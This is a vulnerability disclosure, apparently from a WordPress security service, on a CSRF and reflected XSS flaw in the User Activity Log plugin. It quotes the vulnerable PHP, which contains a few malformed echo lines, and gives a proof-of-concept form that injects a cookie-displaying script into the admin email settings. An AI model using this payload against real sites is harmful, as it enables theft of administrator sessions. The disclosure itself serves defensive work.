Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in User Activity Log
Every additional plugin that you add to your WordPress website adds additional security risk, that includes security plugins. Recently we did a quick check over plugins designed to allow you to keep track actions taken by users on your website. In several of cases we found rather minor security vulnerabilities. Like the first issue we found in the plugin User Activity Log, this one involves a lack of protection against cross-site request forgery (CSRF).
This vulnerability involves a lack of protection against CSRF when saving the plugin’s settings. That is due to a lack on a nonce.
This can be combined with cross-site scripting (XSS) on the Email settings page. While the values are all eventually validated or sanitized, the POST inputs “sol-mail-to” and “sol-mail-from” are stored in variables $to_email and $from_email respectively ahead of them being validated in the file /user_settings_menu.php:
460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 | $to_email = $_POST['sol-mail-to']; $from_email = $_POST['sol-mail-from']; $mail_msg = ual_test_input($_POST['sol-mail-msg']); $emailEnable = $_POST['emailEnable']; update_option('enable_email', $emailEnable); if (isset($_POST['emailEnable'])) { if ($_POST['emailEnable'] == '1') { if ($mail_msg == "") { $msg = __("Please enter message", 'wp_user_log'); } if ($to_email == "" || $from_email == "") { $msg = __("Please enter the email address", 'wp_user_log'); } if (!filter_var($to_email, FILTER_VALIDATE_EMAIL) || !filter_var($from_email, FILTER_VALIDATE_EMAIL) || !is_email($to_email) || !is_email($from_email)) { $msg = __("Please enter valid email address", 'wp_user_log'); } else { update_option('to_email', $to_email); update_option('from_email', $from_email); update_option('email_message', $mail_msg); } } } |
Placing malicious JavaScript code in those inputs will cause there values to not be saved permanently, but the values are later echoed out on the page at
530 | <input name="sol-mail-from" type="email" value="<?php echo $from_email; >" /> |
and
537 | <input name="sol-mail-to" type="email" value="<?php echo $to_email; >" /> |
Since the cross-site scripting (XSS) is reflected and not persistent, in major web browsers other than Firefox it would be hard to exploit this since you would need to get around the XSS filtering they include to protect against this type of exploit.
We received a response from the developer the same day we contacted this issue and the other we discovered, but a month later the plugin has yet to receive an update, so the vulnerabilities still exist in the current version, 1.2.3.
Proof of Concept
The following proof of concept will cause any available cookies to shown in alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=email_settings_menu"" method="POST"> <input type="hidden" name="emailEnable" value="1" /> <input type="hidden" name="sol-mail-from" value='"><script>alert(document.cookie);</script>' /> <input type="submit" name="btnsolEmail" value="Save Changes" /> </form> </body> </html>
Timeline
- 6/29/2016 – Developer notified.
- 6/29/2016 – Developer responds.
- 10/11/2016 – Version 1.2.6 released, which fixes issue.